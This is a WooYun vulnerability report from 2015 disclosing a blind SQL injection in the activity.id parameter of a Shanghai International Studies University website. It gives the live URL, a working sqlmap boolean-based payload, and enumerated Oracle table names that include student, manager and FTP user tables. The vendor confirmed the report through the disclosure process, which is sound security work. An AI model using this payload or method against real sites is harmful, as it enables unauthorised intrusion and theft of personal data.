当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139763

漏洞标题:上海外国语大学某站sql注入一枚

相关厂商:上海外国语大学

漏洞作者: 路人甲

提交时间:2015-09-08 16:43

修复时间:2015-10-23 21:58

公开时间:2015-10-23 21:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-08: 厂商已经确认,细节仅向厂商公开
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

aaaaa

详细说明:

http://www.sinoflt.com/swpx/indexActivity_activityInfo.action?activity.id=202
参数 activity.id

漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: activity.id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: activity.id=202' AND 6464=6464 AND 'bLzg'='bLzg
---
[16:03:16] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
盲注一枚
current schema (equivalent to database on Oracle): 'SWPX'
[16:03:16] [INFO] retrieved: 126
[16:03:23] [INFO] retrieved: ACTIVITION_INFO
[16:03:53] [INFO] retrieved: ACTIVITION_SCORE
[16:04:08] [INFO] retrieved: ACTIVITION_STUDENT
[16:04:34] [INFO] retrieved: COURSEWARE_DIR
[16:05:07] [INFO] retrieved: COURSEWARE_INFO
[16:05:20] [INFO] retrieved: COURSEWARE_TEMPLATE
[16:05:41] [INFO] retrieved: ENTITY_COURSE_ACTIVE
[16:06:22] [INFO] retrieved: ENTITY_COURSE_COURSEWARE
[16:06:49] [INFO] retrieved: ENTITY_COURSE_INFO
[16:07:04] [INFO] retrieved: ENTITY_COURSE_ITEM
[16:07:16] [INFO] retrieved: ENTITY_ELECTIVE
[16:07:39] [INFO] retrieved: ENTITY_MANAGER_INFO
[16:08:06] [INFO] retrieved: ENTITY_NOTE_INFO
[16:08:33] [INFO] retrieved: ENTITY_REGISTER_INFO
[16:09:03] [INFO] retrieved: ENTITY_RESOURCE_INFO
[16:09:30] [INFO] retrieved: ENTITY_RESOURCE_SEMESTER
[16:09:52] [INFO] retrieved: ENTITY_SEMESTER_INFO
[16:10:26] [INFO] retrieved: ENTITY_STUDENT_INFO
[16:11:07] [INFO] retrieved: ENTITY_TEACHER_COURSE
[16:11:43] [INFO] retrieved: ENTITY_TEACHER_INFO
[16:12:00] [INFO] retrieved: ENTITY_TEACH_CLASS
[16:12:17] [INFO] retrieved: FRIEND_LINK
[16:12:44] [INFO] retrieved: FTP_USER
[16:13:05] [INFO] retrieved: INFO_MANAGER_INFO
[16:13:45] [INFO] retrieved: INFO_NEWS
[16:13:56] [INFO] retrieved: INFO_NEWS_TYPE
[16:14:10] [INFO] retrieved: INFO_USER_RIGHT
[16:14:33] [INFO] retrieved: INTERACTION_ANNOUNCE_INFO
[16:15:24] [INFO] retrieved: INTERACTION_ANSWER_INFO
[16:15:50] [INFO] retrieved: INTERACTION_ELITEANSWER_INFO
[16:16:35] [INFO] retrieved: INTERACTION_ELITEQUESTION_INFO
[16:17:12] [INFO] retrieved: INTERACTION_FORUM
[16:17:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
ing to retry the request
LIST_INFO
[16:18:13] [INFO] retrieved: INTERACTION_FORUM_ELITE_DIR
[16:18:50] [INFO] retrieved: INTERACTION_FORUM_INFO
[16:19:08] [INFO] retrieved: INTERACTION_HOMEWORK_CHECK
[16:19:40] [INFO] retrieved: INTERACTION_HOMEWORK_INFO
[16:19:55] [INFO] retrieved: INTERACTION_INHOMEWORK_CHECK
[16:20:32] [INFO] retrieved: INTERACTION_INHOMEWORK_INFO
[16:20:52] [INFO] retrieved: INTERACTION_QUESTION_ELITEDIR
[16:21:47] [INFO] retrieved: INTERACTION_QUESTION_INFO
[16:22:05] [INFO] retrieved: INTERACTION_TEACHCLASS_INFO
[16:22:40] [INFO] retrieved: LEAVEWORD_INFO
[16:23:16] [INFO] retrieved: LEAVEWORD_REPLY
[16:23:34] [INFO] retrieved: MAIL_INFO
[16:23:55] [INFO] retrieved: ONLINEEXAM_COURSE_INFO
[16:24:48] [INFO] retrieved: ONLINEEXAM_COURSE_PAPER
[16:25:04] [INFO] retrieved: ONLINETEST_COURSE_INFO
[16:25:43] [INFO] retrieved: ONLINETEST_COURSE_PAPER
[16:26:02] [INFO] retrieved: PAPER_SELECTIVE
[16:26:36] [INFO] retrieved: PAPER_SUBJECT_INFO
[16:27:08] [INFO] retrieved: PLAN_TABLE
你懂的

修复方案:

1

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-08 21:56

厂商回复:

感谢路人甲发现该漏洞,我们尽快联系厂商修复,谢谢!

最新状态:

暂无